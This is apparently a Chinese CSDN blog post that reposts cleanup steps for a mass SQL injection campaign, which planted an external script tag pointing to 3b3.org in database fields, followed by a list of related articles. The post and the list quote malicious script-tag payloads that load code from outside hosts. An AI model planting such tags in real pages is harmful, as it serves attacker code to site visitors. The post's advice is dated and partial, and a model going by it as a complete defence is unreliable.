解决“<script src=http://3b3.org/c.js> </script>”SQL注入方法

最新推荐文章于 2023-02-20 22:39:52 发布
最新推荐文章于 2023-02-20 22:39:52 发布
阅读量2.5k 收藏
点赞数
分类专栏: 数据库 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hemingwang0902/article/details/5665737
版权

    前两天听一同学讲他们公司做的一个系统被人家 SQL 注入了, 使得数据库中很多数据全部都乱了,导致系统几近瘫痪, 于是在网上疯狂的搜索解决方案,皇天不负苦心人,最终终于在 http://www.21004.com/post/77.html 找到了解决方案,全文如下:

 

    近段时间很多站长反映" <script src=http://3b3.org/c.js> </script> " SQL注入非常猖獗,很多站都被注入这个代码,到目前为止被这个恶意代码威胁的网页至少有203,000页面,其中不少还是行业内知名网站。很多站长对这个注入的方式认识非常少,一旦被注入以后总是治标不治本。笔者结合一些网友经验和做安全朋友解决方法,归纳总结出一个可行性方法,大概步骤如下:

一、进入SQL统一删除字段被挂的js 。

操作方式如下:dbo.数据表 SET 字段= REPLACE(字段, '<script src=http://3b3.org/c.js></script>', '')

二、修改SQL服务中自定义用户和sa的密码。

一般情况下,SQL数据库被入侵成功的情况下,自定义帐户和SA的密码已经暴露,修改这些帐户密码为第三步做准备。

三、彻底杜绝SQL注入。

1.不要使用sa用户连接数据库。
SA帐户拥有所有数据库和数据表的操作权限,在网页中使用SA连接数据库安全隐患非常大。
2、新建一个public权限数据库用户,并用这个用户访问数据库。
为了增加安全系数,建议每个数据库建立独立的只有public权限管理帐户,并用这个用户访问数据库有利于SQL的安全性。
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限 
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
第3、4步大家不需要考究其中的原理,大家只需要照做就行了。

hemingwang0902
关注
专栏目录
ElasticSearch
会写Bug的攻城狮
02-11 7万+
ElasticSearch 一、字段的类型Field type的详解 下面就是所有的字段类型 字符串类型 text,keyword 整数类型 integer,long,short,byte 浮点类型 double,float,half_float,scaled_float 逻辑类型 boolean 日期类型 date 范围类型 range 二进制类型 binary 复合类型 数组类型 array 对象类型 object 嵌套类型 nested 地理类型 地理坐标类型 geo_point 地理地图 geo_s
Python基础_闭包和迭代器
flinjin的博客
03-06 1万+
闭包的概念: 闭包就是内层函数,对外层函数(非全局)的变量的引用,称之为闭包 可以使用__closure__来检测函数是否是闭包,使用函数名.__closure__返回是true就是闭包。 作用: 可以让一个局部变量常驻内存。 使变量更加安全。 def f1(): name = "华山大弟子" #常驻内存,以后什么时候调用函数使用变量的时候,都可以用。 def f2(): ...
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
【网站安全】简单的Js脚本攻击sql注入攻击
gx_up
08-03 2127
实训的第一个月过去 了,那个CRM项目也要告一段落了,到了最后老师检查作业的时候。 没想到老师居然要用骚操作来 测试,一上来就来个js脚本攻击,然后接着一个sql注入登陆。 额,mmpd。之前也没这样讲啊。不然肯定不会这样写 啊。什么js剔除关键符号关键字,sql带参数的。 现在想去改,工作量太大了。就做个输入替换处理吧 。 1、关键字符号"
HotScripts Clone Script SQL Injection Vulnerbility          
weixin_34150224的博客
11-18 143
--==+================================================================================+==-- --==+ HotScripts Clone Script SQL Injection Vulnerbility +==-- --==+=============...
解决并清除SQL被注入<script>恶意病毒代码的语句
ymuyou有木有博客
02-14 1041
declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b ,systypes c where a.id=b.id and a.xtype='u' and c.name in ('char', 'n
关于&lt;script&gt;元素(js两种引用方法:内部嵌入,外部引入)
iuukai
07-12 5957
文章目录一、在HTML中引用JavaScirpt脚本的方法有两种:内部嵌入和外部引用。二、在同一个HTML文档中,调用多个JavaScript脚本。三、&lt;script&gt;元素定义的6个属性。 一、在HTML中引用JavaScirpt脚本的方法有两种:内部嵌入和外部引用。 关于&lt;script&gt;标签的位置问题,虽然&lt;script&gt;&lt;/script&gt;可以放在...
【spider01】Urllib
cs_xuhuan的博客
09-25 7178
Urllib Urllib详解– 什么是urllib? python内置的http请求库 urllib.requests 请求模块 urllib.error 异常处理模块 urllib.parse url解析模块 urllib.robotparse robots.txt解析模块 urlopen urllib.request.urlopen(url,data=None,[timeout,]*,caf...
概述和HTTP请求与响应处理
热门推荐
weixin_30375427的博客
12-08 6万+
1、概述   爬虫,应该称为网络爬虫,也叫网页蜘蛛人,网络蚂蚁等   搜索引擎,就是网络爬虫的应用者 2、爬虫分类   通用爬虫:     常见就是搜索引擎,无差别的收集数据,存储,提交关键字,构建索引库,给用户提供搜索接口     爬取一般流程:       1、初始一批URL,将这些URL放到待爬的队列       2、从队列取出这些URL,通过DNS 解析IP ,对...
urllib爬虫封装(可设置代理,记录日志)方法
qq_41805981的博客
09-18 1万+
urllib爬虫封装(具体其他功能根据需求完善) 1.支持设置HTTP Request Headers ,能设置UA。 2.支持代理服务器的设置。 3.它支持timeout超时机制。 4.它支持网页 的编码指定。 5.它支持服务器返回的错误处理 如果&gt;400 and &lt;500 直接记录日志, 如果错误码是500-600 则重新发起请求。 # -*- coding: ...
SQL注入和XSS攻击
neverSaynever_的博客
02-20 1750
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
src赋值中如何设置post方式请求_通过挖掘某某 src 来学习 json csrf
weixin_39624733的博客
01-28 954
本文作者:comical(信安之路首次投稿作者)在某某 src 进行渗透测试的过程中,发现一个评论的地方并没有对次数进行限制且在数据区域也没有 token 的字眼,因此猜测此处存在 csrf 漏洞,于是就开始了漫长的学习之旅前置知识CSRF:关于 csrf 漏洞相信大家都有了解,而且百度 google 大部分都比我讲的好,这里我就不解释了,贴张图把Json CSRF: 通常我们的 csr...
scriptsrc属性能实现跨越访问
diancui3160的博客
07-25 346
urlencode.php &lt;?php $name=$_POST['name']; $age = $_POST['age']; $array = array("name"=&gt;$name,"age"=&gt;$age); $result = json_encode($array); echo ($result); ?&g...
javascript 过滤 script 非法标签 防止注入
清晨一场梦
07-23 2万+
方法如下: /** * [hasIllegalChar 判断是否含有script非法字符] * @param {[type]} str [要判断的字符串] * @return {Boolean} [true:含有,验证不通过;false:不含有,验证通过] */ function hasIllegalChar(str) { ...
JAVA后端防止XSS攻击(SQL注入、HTML、SCRIPT)基础方法
Codeyi的博客
09-11 1万+
今天在工作中发现自己开发的系统存在XSS漏洞,特写此文章记录解决方案,话不多说截止开车。 防止XSS攻击我们需要做的除了在硬件层面(防火墙、IP白名单)验证外,后端代码也需要做相应的处理,最简单直接的方式添加Filter过滤器。 /** * @Project : codeyi-web * @Package Name : com.codeyi.common.xss * @Company *...
浅谈javascript注入攻击
qq_41914181的博客
10-17 1万+
前言 记录一次防止js注入的项目经历,起因,项目在测试过程中,发现可能存在注入可能,于是拿到代码开始查看,因为现在前后端分离的情况下,需要特殊处理避免XSS攻击(跨站脚本攻击)的情况已经很少了,所以这次情况引起了我的兴趣。 介绍 什么是javascript注入攻击?简单来说,就是页面上输入的内容中带有可执行的javascript,而你使用这段输入内容的时候,让这段用户提供的代码执行了,也就是你写的代码,执行了非你写的代码,就会导致网页的不可行乃至更严重的安全威胁。 传统页面的服务端渲染 因为传统页面基本都是
Hive命令的3种调用方式
05-23 1274
方式1:hive –f  /root/shell/hive-script.sql(适合多语句) hive-script.sql类似于script一样,直接写查询命令就行 例如: [root@cloud4 shell]# vi hive_script3.sql select * from t1; select count(*) from t1; 不进入交互模式,执行一个hive
通过script标签的src属性引入的jsonp
Blog_inG的博客
01-04 4088
script只能读取当前服务器的资源,当需要跨域访问其它服务器上的资源时可通过&lt;script src="http://localhost/a.php?callback=jsnop&amp;_=123456"&gt;来引入外部资源。 src属性返回的内容必须为合格的js代码,例如json([]),正常的js代码,而{}形式的对象并不是合格的js代码,所以会报错。 myObj = { "na...
<script src=http://t.cn/RQlNmlV></script>
<script src=http://t.cn/RQlNmlV></script>
01-21 618
"·&lt;img src="http://10.92.82.161:8088/nxwsbfile/yqfffzyw.png" border="0" &gt;&lt;br&gt;  "怎么解析
最新发布
07-17
&lt;img src="http://10.92.82.161:8088/nxwsbfile/yqfffzyw.png" border="0" &gt;&lt;br&gt;  "通常用于HTML中,表示插入一张图片。其中,`&lt;img&gt;`是一个图像标记,`src`属性...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值